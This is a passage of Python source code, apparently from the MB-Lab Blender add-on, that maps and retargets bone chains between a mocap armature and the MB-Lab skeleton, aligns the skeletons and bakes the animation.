c1 = algorithms.is_string_in_string(ch_id, ch_bone.name)
c2 = ch_bone.name in bones_to_scan
c3 = algorithms.is_too_much_similar(x_bone.name, ch_bone.name)
if c1 and c2 and not c3:
return x_bone.name
return None
@staticmethod
def get_bones_by_index(bones_chain, index_data):
index = None
if bones_chain:
if len(index_data) == 1:
if index_data[0] == "LAST":
index = len(bones_chain)-1
else:
index = index_data[0]
if len(index_data) == 3:
if len(bones_chain) == index_data[0]:
index = index_data[1]
else:
index = index_data[2]
if index == "None":
index = None
if index is not None:
try:
return bones_chain[index]
except IndexError:
logger.warning("The chain %s of mocap file has less bones than the chain in MB-Lab", bones_chain)
return None
# def get_bones_by_parent(self, armat, bones_to_scan, parent_IDs):
# found_bones = set()
# for bone_name in bones_to_scan:
# parent_name = self.bone_parent_name(armat, bone_name)
# for pr_id in parent_IDs:
# if algorithms.is_string_in_string(pr_id, parent_name):
# found_bones.add(bone_name)
# return found_bones
@staticmethod
def get_bone_chains(armat, bone_names):
found_chains = []
for bone_name in bone_names:
bn = armat.data.bones[bone_name]
chain = [bone_name] + [b.name for b in bn.parent_recursive]
found_chains.append(chain)
return found_chains
@staticmethod
def get_all_bone_names(armat):
bone_names = []
for bn in armat.data.bones:
bone_names.append(bn.name)
return bone_names
@staticmethod
@lru_cache(maxsize=2)
def generate_bones_ids(side):
bone_ids = ("forearm", "elbow", "lowerarm", "hand", "wrist", "finger", "thumb", "index",
"ring", "pink", "thigh", "upperleg", "upper_leg", "leg", "knee", "shin", "calf",
"lowerleg", "lower_leg", "toe", "ball", "foot")
bn_pos = "r" if side == "RIGHT" else "l"
combo_bones_start = []
combo_bones_end = []
for b_id in bone_ids:
combo_bones_start.append(f'{bn_pos}{b_id}')
combo_bones_end.append(f'{b_id}{bn_pos}')
return combo_bones_start, combo_bones_end
def is_in_side(self, bone_names, side):
score_level = 0.0
if side == "RIGHT":
id_side2 = "right"
id_side3 = ("r.", "r_")
id_side4 = ("_r", ".r")
if side == "LEFT":
id_side2 = "left"
id_side3 = ("l.", "l_")
id_side4 = ("_l", ".l")
combo_bones_start, combo_bones_end = self.generate_bones_ids(side)
for bone_name in bone_names:
bone_name = bone_name.lower()
if len(bone_name) > 3:
c1 = bone_name[:2] in id_side3
c2 = bone_name[-2:] in id_side4
c3 = id_side2 in bone_name
c4 = algorithms.is_in_list(bone_names, combo_bones_start, "START")
c5 = algorithms.is_in_list(bone_names, combo_bones_end, "END")
if c1 or c2 or c3 or c4 or c5:
score_level += 1
if bone_names:
return score_level/len(bone_names)
return 0
@staticmethod
def order_with_list(bones_set, bones_list):
ordered_bones = []
for bone in bones_list:
if bone in bones_set:
ordered_bones.append(bone)
return ordered_bones
def chains_intersection(self, chains):
chain_sets = []
chain_inters = None
result_chain = []
for chain in chains:
chain_sets.append(set(chain))
for i, chain in enumerate(chain_sets):
chain_inters = chain if chain_inters is None else chain_inters.intersection(chain)
result_chain = self.order_with_list(chain_inters, chains[i])
return result_chain
@staticmethod
def filter_chains_by_max_length(chains):
longer_chains = []
max_length = 0
for chain in chains:
max_length = max(max_length, len(chain))
for chain in chains:
if len(chain) == max_length:
longer_chains.append(chain)
return longer_chains
def chains_difference(self, chain_list, subchain_list):
subchain_set = set(subchain_list)
chain_set = set(chain_list)
d_chain = chain_set.difference(subchain_set)
return self.order_with_list(d_chain, chain_list)
def filter_chains_by_side(self, chains):
left_chains = []
right_chains = []
center_chains = []
for chain in chains:
score_left = self.is_in_side(chain, "LEFT")
score_right = self.is_in_side(chain, "RIGHT")
if score_left > 0:
left_chains.append(chain)
elif score_right > 0:
right_chains.append(chain)
else:
center_chains.append(chain)
if not center_chains:
score_threshold = 0
for chain in chains:
score_left = self.is_in_side(chain, "LEFT")
score_right = self.is_in_side(chain, "RIGHT")
score_center = 1.0-score_left-score_right
if score_center > score_threshold:
score_threshold = score_center
center_chain = chain
center_chains.append(center_chain)
return left_chains, center_chains, right_chains
@staticmethod
def filter_chains_by_tail(chains, chain_ids):
target_chains_lists = []
if chains:
for chain in chains:
chain_tail = chain[0]
if algorithms.is_in_list(chain_ids, [chain_tail]):
target_chains_lists.append(chain)
return target_chains_lists
@staticmethod
def clear_chain_by_dot_product(chain, armature):
algorithms.select_and_change_mode(armature, 'EDIT')
if len(chain) > 2:
edit_bones = algorithms.get_edit_bones(armature)
bone_name = chain[0]
if bone_name in edit_bones:
e_bone = edit_bones[bone_name]
if e_bone.parent:
v1 = e_bone.vector.normalized()
v2 = e_bone.parent.vector.normalized()
if v1.dot(v2) < 0.5:
logger.info("Retarget: Bone %s removed BY DOT", bone_name)
chain.remove(bone_name)
algorithms.select_and_change_mode(armature, 'POSE') # TODO: store the status and restore it
return chain
@staticmethod
def clear_chain_by_length(chain, armature):
algorithms.select_and_change_mode(armature, 'EDIT')
for bone_name in chain:
edit_bones = algorithms.get_edit_bones(armature)
if bone_name in edit_bones:
e_bone = edit_bones[bone_name]
if e_bone.parent:
if e_bone.length < e_bone.parent.length/8:
logger.info("Retarget: Bone %s removed BY LENGTH", bone_name)
chain.remove(bone_name)
algorithms.select_and_change_mode(armature, 'POSE') # TODO: store the status and restore it
return chain
def filter_chains_by_dotprod(self, armature):
self.spine_bones_names = self.clear_chain_by_dot_product(self.spine_bones_names, armature)
self.head_bones_names = self.clear_chain_by_dot_product(self.head_bones_names, armature)
self.rarm_bones_names = self.clear_chain_by_dot_product(self.rarm_bones_names, armature)
self.larm_bones_names = self.clear_chain_by_dot_product(self.larm_bones_names, armature)
self.pelvis_bones_names = self.clear_chain_by_dot_product(self.pelvis_bones_names, armature)
self.ltoe_and_leg_names = self.clear_chain_by_dot_product(self.ltoe_and_leg_names, armature)
self.rtoe_and_leg_names = self.clear_chain_by_dot_product(self.rtoe_and_leg_names, armature)
self.rfinger0_bones_names = self.clear_chain_by_dot_product(self.rfinger0_bones_names, armature)
self.rfinger1_bones_names = self.clear_chain_by_dot_product(self.rfinger1_bones_names, armature)
self.rfinger2_bones_names = self.clear_chain_by_dot_product(self.rfinger2_bones_names, armature)
self.rfinger3_bones_names = self.clear_chain_by_dot_product(self.rfinger3_bones_names, armature)
self.rfinger4_bones_names = self.clear_chain_by_dot_product(self.rfinger4_bones_names, armature)
self.lfinger0_bones_names = self.clear_chain_by_dot_product(self.lfinger0_bones_names, armature)
self.lfinger1_bones_names = self.clear_chain_by_dot_product(self.lfinger1_bones_names, armature)
self.lfinger2_bones_names = self.clear_chain_by_dot_product(self.lfinger2_bones_names, armature)
self.lfinger3_bones_names = self.clear_chain_by_dot_product(self.lfinger3_bones_names, armature)
self.lfinger4_bones_names = self.clear_chain_by_dot_product(self.lfinger4_bones_names, armature)
def filter_chains_by_length(self, armature):
self.head_bones_names = self.clear_chain_by_length(self.head_bones_names, armature)
self.rarm_bones_names = self.clear_chain_by_length(self.rarm_bones_names, armature)
self.larm_bones_names = self.clear_chain_by_length(self.larm_bones_names, armature)
self.rleg_bones_names = self.clear_chain_by_length(self.rleg_bones_names, armature)
self.lleg_bones_names = self.clear_chain_by_length(self.lleg_bones_names, armature)
self.ltoe_and_leg_names = self.clear_chain_by_length(self.ltoe_and_leg_names, armature)
self.rtoe_and_leg_names = self.clear_chain_by_length(self.rtoe_and_leg_names, armature)
self.rfinger0_bones_names = self.clear_chain_by_length(self.rfinger0_bones_names, armature)
self.rfinger1_bones_names = self.clear_chain_by_length(self.rfinger1_bones_names, armature)
self.rfinger2_bones_names = self.clear_chain_by_length(self.rfinger2_bones_names, armature)
self.rfinger3_bones_names = self.clear_chain_by_length(self.rfinger3_bones_names, armature)
self.rfinger4_bones_names = self.clear_chain_by_length(self.rfinger4_bones_names, armature)
self.lfinger0_bones_names = self.clear_chain_by_length(self.lfinger0_bones_names, armature)
self.lfinger1_bones_names = self.clear_chain_by_length(self.lfinger1_bones_names, armature)
self.lfinger2_bones_names = self.clear_chain_by_length(self.lfinger2_bones_names, armature)
self.lfinger3_bones_names = self.clear_chain_by_length(self.lfinger3_bones_names, armature)
self.lfinger4_bones_names = self.clear_chain_by_length(self.lfinger4_bones_names, armature)
@staticmethod
def filter_chains_by_id(chains, chain_ids):
target_chains_lists = []
for chain in chains:
if algorithms.is_in_list(chain_ids, chain):
target_chains_lists.append(chain)
return target_chains_lists
@staticmethod
def filter_chains_by_order(chains, n_ord):
named_fingers = ("thu", "ind", "mid", "ring", "pink")
identifiers = []
for chain in chains:
if chain:
identifiers.append(chain[0])
identifiers.sort()
result_chain = []
chain_order = None
chain_id = None
if algorithms.is_in_list(named_fingers, identifiers):
chain_order = "NAMED"
else:
chain_order = "NUMBERED"
if chain_order == "NAMED":
chain_id = named_fingers[n_ord]
if chain_order == "NUMBERED":
if len(identifiers) > n_ord:
chain_id = identifiers[n_ord]
if chain_id:
chain_id = chain_id.lower()
for chain in chains:
chain_tail = chain[0]
chain_tail = chain_tail.lower()
if chain_id in chain_tail:
result_chain = chain
return result_chain
return result_chain
def identify_bone_chains(self, chains):
left_chains, center_chains, right_chains = self.filter_chains_by_side(chains)
# ARM_CHAIN_IDS
arm_chain_ids = ("arm", "elbow", "hand", "wrist", "finger", "thumb", "index",
"ring", "pink", "mid")
arms_tail_chains = self.filter_chains_by_id(chains, arm_chain_ids)
arms_tail_chains = self.filter_chains_by_max_length(arms_tail_chains)
spine_chain = self.chains_intersection(arms_tail_chains)
right_arm_tail_chains = self.filter_chains_by_tail(right_chains, arm_chain_ids)
right_arm_tail_chains = self.filter_chains_by_max_length(right_arm_tail_chains)
r_arm_spine_chain = self.chains_intersection(right_arm_tail_chains)
right_arm_chain = self.chains_difference(r_arm_spine_chain, spine_chain)
left_arm_tail_chains = self.filter_chains_by_tail(left_chains, arm_chain_ids)
left_arm_tail_chains = self.filter_chains_by_max_length(left_arm_tail_chains)
l_arm_spine_chain = self.chains_intersection(left_arm_tail_chains)
left_arm_chain = self.chains_difference(l_arm_spine_chain, spine_chain)
# HEAD_CHAIN_IDS
head_chain_ids = ("head", "neck", "skull", "face", "spine")
head_tail_chains = self.filter_chains_by_id(center_chains, head_chain_ids)
head_tail_chains = self.filter_chains_by_max_length(head_tail_chains)
head_and_spine_chains = self.chains_intersection(head_tail_chains)
head_chain = self.chains_difference(head_and_spine_chains, spine_chain)
# FINGER_CHAIN_IDS
finger_chain_ids = ("finger", "thumb", "index", "ring", "pink", "mid")
# RIGHT
right_fingers_tail_chains = self.filter_chains_by_tail(right_chains, finger_chain_ids)
r_finger_arm_spine_chain = self.chains_intersection(right_fingers_tail_chains)
right_fingers_chain = [self.chains_difference(fingr, r_finger_arm_spine_chain)
for fingr in right_fingers_tail_chains]
# LEFT
left_fingers_tail_chains = self.filter_chains_by_tail(left_chains, finger_chain_ids)
l_finger_arm_spine_chain = self.chains_intersection(left_fingers_tail_chains)
left_fingers_chain = [self.chains_difference(fingr, l_finger_arm_spine_chain)
for fingr in left_fingers_tail_chains]
# FOOT_CHAIN_IDS
foot_chain_ids = ("foot", "ankle", "toe", "ball")
right_foot_tail_chains = self.filter_chains_by_tail(right_chains, foot_chain_ids)
right_foot_tail_chains.sort()
self.rtoe_and_leg_names = right_foot_tail_chains[0]
right_foot_tail_chains = self.filter_chains_by_max_length(right_foot_tail_chains)
r_leg_and_spine_chain = self.chains_intersection(right_foot_tail_chains)
right_leg_chain = self.chains_difference(r_leg_and_spine_chain, spine_chain)
right_toes_chain = [self.chains_difference(toe, r_leg_and_spine_chain) for toe in right_foot_tail_chains]
right_toes_chain = self.filter_chains_by_max_length(right_toes_chain)
left_foot_tail_chains = self.filter_chains_by_tail(left_chains, foot_chain_ids)
left_foot_tail_chains.sort()
self.ltoe_and_leg_names = left_foot_tail_chains[0]
left_foot_tail_chains = self.filter_chains_by_max_length(left_foot_tail_chains)
l_leg_and_spine_chain = self.chains_intersection(left_foot_tail_chains)
left_leg_chain = self.chains_difference(l_leg_and_spine_chain, spine_chain)
left_toes_chain = [self.chains_difference(toe, l_leg_and_spine_chain) for toe in left_foot_tail_chains]
left_toes_chain = self.filter_chains_by_max_length(left_toes_chain)
feet_tail_chains = self.filter_chains_by_tail(chains, foot_chain_ids)
# TODO not used
# leg_chain_IDs = ["thigh", "upperleg", "upper_leg", "leg", "knee", "shin",
# "calf", "lowerleg", "lower_leg", "foot", "ankle", "toe", "ball"]
pelvis_chain = self.chains_intersection(feet_tail_chains)
self.spine_bones_names = spine_chain
self.head_bones_names = head_chain
self.rarm_bones_names = right_arm_chain
self.larm_bones_names = left_arm_chain
self.rleg_bones_names = right_leg_chain
self.lleg_bones_names = left_leg_chain
self.pelvis_bones_names = pelvis_chain
self.rfinger0_bones_names = self.filter_chains_by_order(right_fingers_chain, 0)
self.rfinger1_bones_names = self.filter_chains_by_order(right_fingers_chain, 1)
self.rfinger2_bones_names = self.filter_chains_by_order(right_fingers_chain, 2)
self.rfinger3_bones_names = self.filter_chains_by_order(right_fingers_chain, 3)
self.rfinger4_bones_names = self.filter_chains_by_order(right_fingers_chain, 4)
self.lfinger0_bones_names = self.filter_chains_by_order(left_fingers_chain, 0)
self.lfinger1_bones_names = self.filter_chains_by_order(left_fingers_chain, 1)
self.lfinger2_bones_names = self.filter_chains_by_order(left_fingers_chain, 2)
self.lfinger3_bones_names = self.filter_chains_by_order(left_fingers_chain, 3)
self.lfinger4_bones_names = self.filter_chains_by_order(left_fingers_chain, 4)
@staticmethod
def get_ending_bones(armat):
found_bones = set()
for bn in armat.data.bones:
if not bn.children:
found_bones.add(bn.name)
return found_bones
@staticmethod
def string_similarity(main_string, identifiers, side):
m_string = main_string.lower()
sub_string_found = False
substrings = []
if side == 'LEFT':
substrings = ["l-", "-l", "_l", "l_", ".l", "l.", "left"]
if side == 'RIGHT':
substrings = ["r-", "-r", "_r", "r_", ".r", "r.", "right"]
for id_string in identifiers:
if id_string in m_string:
sub_string_found = True
if sub_string_found:
strings_to_subtract = identifiers + substrings
for s_string in strings_to_subtract:
s_string = s_string.lower()
if s_string in m_string:
m_string = m_string.replace(s_string, "")
return len(m_string)
return 1000
def get_bone_by_similar_id(self, bones_to_scan, bone_identifiers, side):
diff_length = 100
result = None
if bones_to_scan:
for bone_name in bones_to_scan:
score = self.string_similarity(bone_name, bone_identifiers, side)
if score < diff_length:
diff_length = score
result = bone_name
return result
def find_bone(self, armat, bone_type, search_method):
if not self.knowledge_database:
return None
bone_knowledge = self.knowledge_database[bone_type]
main_ids = bone_knowledge["main_IDs"]
children_ids = bone_knowledge["children_IDs"]
# parent_IDs = bone_knowledge["parent_IDs"]
side = bone_knowledge["side"]
chain_id = bone_knowledge["chain_ID"]
position_in_chain = bone_knowledge["position_in_chain"]
bones_chain = None
if chain_id == "spine_bones_names":
bones_chain = self.spine_bones_names
elif chain_id == "rarm_bones_names":
bones_chain = self.rarm_bones_names
elif chain_id == "larm_bones_names":
bones_chain = self.larm_bones_names
elif chain_id == "rleg_bones_names":
bones_chain = self.rleg_bones_names
elif chain_id == "lleg_bones_names":
bones_chain = self.lleg_bones_names
elif chain_id == "head_bones_names":
bones_chain = self.head_bones_names
elif chain_id == "pelvis_bones_names":
bones_chain = self.pelvis_bones_names
elif chain_id == "rtoe_and_leg_names":
bones_chain = self.rtoe_and_leg_names
elif chain_id == "ltoe_and_leg_names":
bones_chain = self.ltoe_and_leg_names
elif chain_id == "rfinger0_bones_names":
bones_chain = self.rfinger0_bones_names
elif chain_id == "rfinger1_bones_names":
bones_chain = self.rfinger1_bones_names
elif chain_id == "rfinger2_bones_names":
bones_chain = self.rfinger2_bones_names
elif chain_id == "rfinger3_bones_names":
bones_chain = self.rfinger3_bones_names
elif chain_id == "rfinger4_bones_names":
bones_chain = self.rfinger4_bones_names
elif chain_id == "lfinger0_bones_names":
bones_chain = self.lfinger0_bones_names
elif chain_id == "lfinger1_bones_names":
bones_chain = self.lfinger1_bones_names
elif chain_id == "lfinger2_bones_names":
bones_chain = self.lfinger2_bones_names
elif chain_id == "lfinger3_bones_names":
bones_chain = self.lfinger3_bones_names
elif chain_id == "lfinger4_bones_names":
bones_chain = self.lfinger4_bones_names
elif chain_id == "all_chains":
bones_chain = self.get_all_bone_names(armat)
if bones_chain:
all_methods = ["by_exact_name", "by_chain_index", "by_similar_name", "by_children"]
search_sequence = [search_method] # The first method is the one in knowledge
for methd in all_methods:
if methd not in search_sequence:
search_sequence.append(methd)
for s_method in search_sequence:
if s_method == "by_exact_name":
result = self.get_bone_by_exact_id(bones_chain, main_ids, side)
if result:
logger.info("Retarget: Bone %s found BY EXACT NAME", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
if s_method == "by_similar_name":
result = self.get_bone_by_similar_id(bones_chain, main_ids, side)
if result:
logger.info("Retarget: Bone %s found BY SIMILAR NAME", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
if s_method == "by_children":
result = self.get_bone_by_childr(armat, bones_chain, children_ids)
if result:
logger.info("Retarget: Bone %s found BY CHILDREN", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
if s_method == "by_chain_index":
result = self.get_bones_by_index(bones_chain, position_in_chain)
if result:
logger.info("Retarget: Bone %s found BY CHAIN INDEX", bone_type)
if result not in self.already_mapped_bones:
self.already_mapped_bones.append(result)
logger.info("Retarget: %s added to mapped bones", result)
return result
logger.warning("All retarget methods failed for %s.", bone_type)
#logger.warning(No candidates found in: {0}, or the candidate found is already mapped to another bone".format(bones_chain))
return None
def bone_parent_name(self, armat, b_name):
x_bone = self.get_bone(armat, b_name)
if x_bone:
if x_bone.parent:
return x_bone.parent.name
return None
def get_bone(self, armat, b_name, b_type="TARGET"):
if armat:
if b_type == "TARGET":
if b_name:
if b_name in armat.pose.bones:
return armat.pose.bones[b_name]
if b_type == "SOURCE":
b_name = self.get_mapped_name(b_name)
if b_name:
if b_name in armat.pose.bones:
return armat.pose.bones[b_name]
return None
@staticmethod
def get_target_editbone(armat, b_name,):
if bpy.context.object.mode == "EDIT":
if b_name:
ebone = algorithms.get_edit_bone(armat, b_name)
if ebone:
return ebone
logger.warning("%s not found in edit mode of target armature %s", b_name, armat)
return None
else:
logger.warning("Warning: Can't get the edit bone of %s because the mode is %s",
bpy.context.scene.objects.active, bpy.context.object.mode)
return None
def get_source_editbone(self, armat, b_name):
if bpy.context.object.mode == "EDIT":
b_name = self.get_mapped_name(b_name)
if b_name:
ebone = algorithms.get_edit_bone(armat, b_name)
if ebone:
return ebone
logger.warning("%s not found in edit mode of source armature %s", b_name, armat)
return None
else:
logger.warning("Warning: Can't get the edit bone of %s because the mode is %s",
bpy.context.scene.objects.active, bpy.context.object.mode)
return None
def get_mapped_name(self, b_name):
return self.skeleton_mapped.get(b_name)
def map_bone(self, armat, b_name, b_type, s_method):
mapped_name = self.find_bone(armat, b_type, s_method)
if mapped_name is not None:
self.skeleton_mapped[b_name] = mapped_name
def map_by_direct_parent(self, armat, childr_name, map_name):
childr_bone_name = self.get_mapped_name(childr_name)
if childr_bone_name:
parent_bone_name = self.bone_parent_name(armat, childr_bone_name)
if parent_bone_name:
if parent_bone_name not in self.already_mapped_bones:
self.skeleton_mapped[map_name] = parent_bone_name
self.already_mapped_bones.append(parent_bone_name)
return True
logger.warning("Error in mapping %s as direct parent of %s", map_name, childr_name)
return False
def map_main_bones(self, armat):
ending_bones = self.get_ending_bones(armat)
chains = self.get_bone_chains(armat, ending_bones)
self.identify_bone_chains(chains)
self.filter_chains_by_length(armat)
self.filter_chains_by_dotprod(armat)
for bone in (
("clavicle_L", "LCLAVICLE", "by_exact_name"),
("clavicle_R", "RCLAVICLE", "by_exact_name"),
("head", "HEAD", "by_exact_name"),
("lowerarm_R", "RFOREARM", "by_exact_name"),
("lowerarm_L", "LFOREARM", "by_exact_name"),
("upperarm_R", "RUPPERARM", "by_children"),
("upperarm_L", "LUPPERARM", "by_children"),
("hand_R", "RHAND", "by_exact_name"),
("hand_L", "LHAND", "by_exact_name"),
("breast_R", "RBREAST", "by_exact_name"),
("breast_L", "LBREAST", "by_exact_name"),
("calf_R", "RCALF", "by_exact_name"),
("calf_L", "LCALF", "by_exact_name"),
("foot_R", "RFOOT", "by_exact_name"),
("foot_L", "LFOOT", "by_exact_name"),
("toes_R", "RTOE", "by_exact_name"),
("toes_L", "LTOE", "by_exact_name"),
("pelvis", "PELVIS", "by_exact_name"),
("spine03", "CHEST", "by_chain_index"),
):
self.map_bone(armat, *bone)
if not self.map_by_direct_parent(armat, "head", "neck"):
self.map_bone(armat, "neck", "NECK", "by_similar_name") # TODO: integrate in find function
self.map_by_direct_parent(armat, "spine03", "spine02")
self.map_by_direct_parent(armat, "spine02", "spine01")
self.map_by_direct_parent(armat, "calf_R", "thigh_R")
self.map_by_direct_parent(armat, "calf_L", "thigh_L")
for bone in (
("thumb03_R", "RTHUMB03", "by_chain_index"),
("thumb02_R", "RTHUMB02", "by_chain_index"),
("thumb01_R", "RTHUMB01", "by_chain_index"),
("index03_R", "RINDEX03", "by_chain_index"),
("index02_R", "RINDEX02", "by_chain_index"),
("index01_R", "RINDEX01", "by_chain_index"),
("index00_R", "RINDEX00", "by_exact_name"),
("middle03_R", "RMIDDLE03", "by_chain_index"),
("middle02_R", "RMIDDLE02", "by_chain_index"),
("middle01_R", "RMIDDLE01", "by_chain_index"),
("middle00_R", "RMIDDLE00", "by_exact_name"),
("ring03_R", "RRING03", "by_chain_index"),
("ring02_R", "RRING02", "by_chain_index"),
("ring01_R", "RRING01", "by_chain_index"),
("ring00_R", "RRING00", "by_exact_name"),
("pinky03_R", "RPINKY03", "by_chain_index"),
("pinky02_R", "RPINKY02", "by_chain_index"),
("pinky01_R", "RPINKY01", "by_chain_index"),
("pinky00_R", "RPINKY00", "by_exact_name"),
("thumb03_L", "LTHUMB03", "by_chain_index"),
("thumb02_L", "LTHUMB02", "by_chain_index"),
("thumb01_L", "LTHUMB01", "by_chain_index"),
("index03_L", "LINDEX03", "by_chain_index"),
("index02_L", "LINDEX02", "by_chain_index"),
("index01_L", "LINDEX01", "by_chain_index"),
("index00_L", "LINDEX00", "by_exact_name"),
("middle03_L", "LMIDDLE03", "by_chain_index"),
("middle02_L", "LMIDDLE02", "by_chain_index"),
("middle01_L", "LMIDDLE01", "by_chain_index"),
("middle00_L", "LMIDDLE00", "by_exact_name"),
("ring03_L", "LRING03", "by_chain_index"),
("ring02_L", "LRING02", "by_chain_index"),
("ring01_L", "LRING01", "by_chain_index"),
("ring00_L", "LRING00", "by_exact_name"),
("pinky03_L", "LPINKY03", "by_chain_index"),
("pinky02_L", "LPINKY02", "by_chain_index"),
("pinky01_L", "LPINKY01", "by_chain_index"),
("pinky00_L", "LPINKY00", "by_exact_name"),
("upperarm_twist_R", "RUPPERARM_TWIST", "by_exact_name"),
("upperarm_twist_L", "LUPPERARM_TWIST", "by_exact_name"),
("lowerarm_twist_R", "RFOREARM_TWIST", "by_exact_name"),
("lowerarm_twist_L", "LFOREARM_TWIST", "by_exact_name"),
("thigh_twist_R", "RUPPERLEG_TWIST", "by_exact_name"),
("thigh_twist_L", "LUPPERLEG_TWIST", "by_exact_name"),
("thigh_calf_R", "RCALF_TWIST", "by_exact_name"),
("thigh_calf_L", "LCALF_TWIST", "by_exact_name"),
):
self.map_bone(armat, *bone)
def bake_animation(self, target_armat, source_armat):
f_range = [0, bpy.context.scene.frame_current]
algorithms.select_and_change_mode(target_armat, 'POSE')
if source_armat.animation_data:
source_action = source_armat.animation_data.action
f_range = source_action.frame_range
bpy.ops.nla.bake(frame_start=f_range[0], frame_end=f_range[1], only_selected=False,
visual_keying=True, clear_constraints=False, use_current_action=True, bake_types={'POSE'})
self.remove_armature_constraints(target_armat)
@staticmethod
def reset_bones_rotations(armat):
reset_val = mathutils.Quaternion((1.0, 0.0, 0.0, 0.0))
for p_bone in armat.pose.bones:
if p_bone.rotation_mode == 'QUATERNION':
reset_val = mathutils.Quaternion((1.0, 0.0, 0.0, 0.0))
p_bone.rotation_quaternion = reset_val
elif p_bone.rotation_mode == 'AXIS_ANGLE':
reset_val = mathutils.Vector((0.0, 0.0, 1.0, 0.0))
p_bone.rotation_axis_angle = reset_val
else:
reset_val = mathutils.Euler((0.0, 0.0, 0.0))
p_bone.rotation_euler = reset_val
# TODO skeleton structure check
def calculate_skeleton_vectors(self, armat, armat_type, rot_type):
algorithms.select_and_change_mode(armat, "EDIT")
if armat_type == 'SOURCE':
head_bone = self.get_source_editbone(armat, "head")
pelvis_bone = self.get_source_editbone(armat, "pelvis")
hand_bone1 = self.get_source_editbone(armat, "hand_R")
hand_bone2 = self.get_source_editbone(armat, "hand_L")
if not head_bone:
head_bone = self.get_source_editbone(armat, "neck")
if not hand_bone1:
hand_bone1 = self.get_source_editbone(armat, "lowerarm_R")
if not hand_bone2:
hand_bone2 = self.get_source_editbone(armat, "lowerarm_L")
elif armat_type == 'TARGET':
head_bone = self.get_target_editbone(armat, "head")
pelvis_bone = self.get_target_editbone(armat, "pelvis")
hand_bone1 = self.get_target_editbone(armat, "hand_R")
hand_bone2 = self.get_target_editbone(armat, "hand_L")
if not head_bone:
head_bone = self.get_target_editbone(armat, "neck")
if not hand_bone1:
hand_bone1 = self.get_target_editbone(armat, "lowerarm_R")
if not hand_bone2:
hand_bone2 = self.get_target_editbone(armat, "lowerarm_L")
if head_bone and pelvis_bone and hand_bone1 and hand_bone2:
vect1 = head_bone.head - pelvis_bone.head
vect2 = hand_bone2.head - hand_bone1.head
algorithms.select_and_change_mode(armat, "POSE")
if rot_type == "ALIGN_SPINE":
return vect1.normalized()
if rot_type == "ALIGN_SHOULDERS":
return vect2.normalized()
else:
algorithms.select_and_change_mode(armat, "POSE")
return None
@staticmethod
def define_angle_direction(vect1, vect2, rot_axis, angle):
angle1 = mathutils.Quaternion(rot_axis, angle)
angle2 = mathutils.Quaternion(rot_axis, -angle)
v_rot1 = vect1.copy()
v_rot2 = vect1.copy()
v_rot1.rotate(angle1)
v_rot2.rotate(angle2)
v_dot1 = v_rot1.dot(vect2)
v_dot2 = v_rot2.dot(vect2)
if v_dot1 >= 0 and v_dot1 >= v_dot2:
return angle1
if v_dot2 >= 0 and v_dot2 >= v_dot1:
return angle2
return mathutils.Quaternion((0.0, 0.0, 1.0), 0)
def align_skeleton(self, target_armat, source_armat):
self.calculate_skeleton_rotations(target_armat, source_armat, "ALIGN_SPINE")
self.calculate_skeleton_rotations(target_armat, source_armat, "ALIGN_SHOULDERS")
def calculate_skeleton_rotations(self, target_armat, source_armat, rot_type):
algorithms.apply_object_transformation(source_armat)
source_vectors = self.calculate_skeleton_vectors(source_armat, 'SOURCE', rot_type)
if source_vectors:
target_vectors = self.calculate_skeleton_vectors(target_armat, 'TARGET', rot_type)
if rot_type == "ALIGN_SHOULDERS":
source_vectors.z = 0.0
if target_vectors:
angle = source_vectors.angle(target_vectors)
rot_axis = source_vectors.cross(target_vectors)
rot = self.define_angle_direction(source_vectors, target_vectors, rot_axis, angle)
self.rotate_skeleton(source_armat, rot)
algorithms.apply_object_transformation(source_armat)
else:
logger.warning("Cannot calculate the target vector for armature alignment")
else:
logger.warning("Cannot calculate the source vector for armature alignment")
@staticmethod
def rotate_skeleton(armat, rot_quat):
armat.rotation_mode = 'QUATERNION'
armat.rotation_quaternion = rot_quat
bpy.context.view_layer.update()
def use_animation_pelvis(self, target_armat, source_armat):
if target_armat and source_armat:
v1 = None
v2 = None
armat_prop = self.get_armature_proportion(target_armat, source_armat)
algorithms.select_and_change_mode(source_armat, 'EDIT')
source_pelvis = self.get_source_editbone(source_armat, "pelvis")
r_thigh_bone = self.get_source_editbone(source_armat, "thigh_R")
l_thigh_bone = self.get_source_editbone(source_armat, "thigh_L")
if source_pelvis and r_thigh_bone and l_thigh_bone:
p1 = (r_thigh_bone.head + l_thigh_bone.head) * 0.5
p2 = source_pelvis.head
p3 = source_pelvis.tail
v1 = armat_prop * (p2 - p1)
v2 = armat_prop * (p3 - p2)
algorithms.select_and_change_mode(source_armat, 'POSE')
if v1 and v2:
algorithms.select_and_change_mode(target_armat, 'EDIT')
target_pelvis = self.get_target_editbone(target_armat, "pelvis")
r_thigh_bone = self.get_target_editbone(target_armat, "thigh_R")
l_thigh_bone = self.get_target_editbone(target_armat, "thigh_L")
if target_pelvis and r_thigh_bone and l_thigh_bone:
p1a = (r_thigh_bone.head + l_thigh_bone.head) * 0.5
target_pelvis.head = p1a + v1
target_pelvis.tail = target_pelvis.head + v2
algorithms.select_and_change_mode(target_armat, 'POSE')
def armature_height(self, armat, armat_type):
if not armat:
logger.warning("Cannot found the source armature for height calculation")
return 0
algorithms.set_object_visible(armat)
algorithms.select_and_change_mode(armat, 'EDIT')
upper_point = None
lower_point = None
if armat_type == 'SOURCE':
r_foot_bone = self.get_source_editbone(armat, "foot_R")
l_foot_bone = self.get_source_editbone(armat, "foot_L")
r_calf_bone = self.get_source_editbone(armat, "calf_R")
l_calf_bone = self.get_source_editbone(armat, "calf_L")
r_clavicle_bone = self.get_source_editbone(armat, "clavicle_R")
l_clavicle_bone = self.get_source_editbone(armat, "clavicle_L")
r_upperarm_bone = self.get_source_editbone(armat, "upperarm_R")
l_upperarm_bone = self.get_source_editbone(armat, "upperarm_L")
elif armat_type == 'TARGET':
r_foot_bone = self.get_target_editbone(armat, "foot_R")
l_foot_bone = self.get_target_editbone(armat, "foot_L")
r_calf_bone = self.get_target_editbone(armat, "calf_R")
l_calf_bone = self.get_target_editbone(armat, "calf_L")
r_clavicle_bone = self.get_target_editbone(armat, "clavicle_R")
l_clavicle_bone = self.get_target_editbone(armat, "clavicle_L")
r_upperarm_bone = self.get_target_editbone(armat, "upperarm_R")
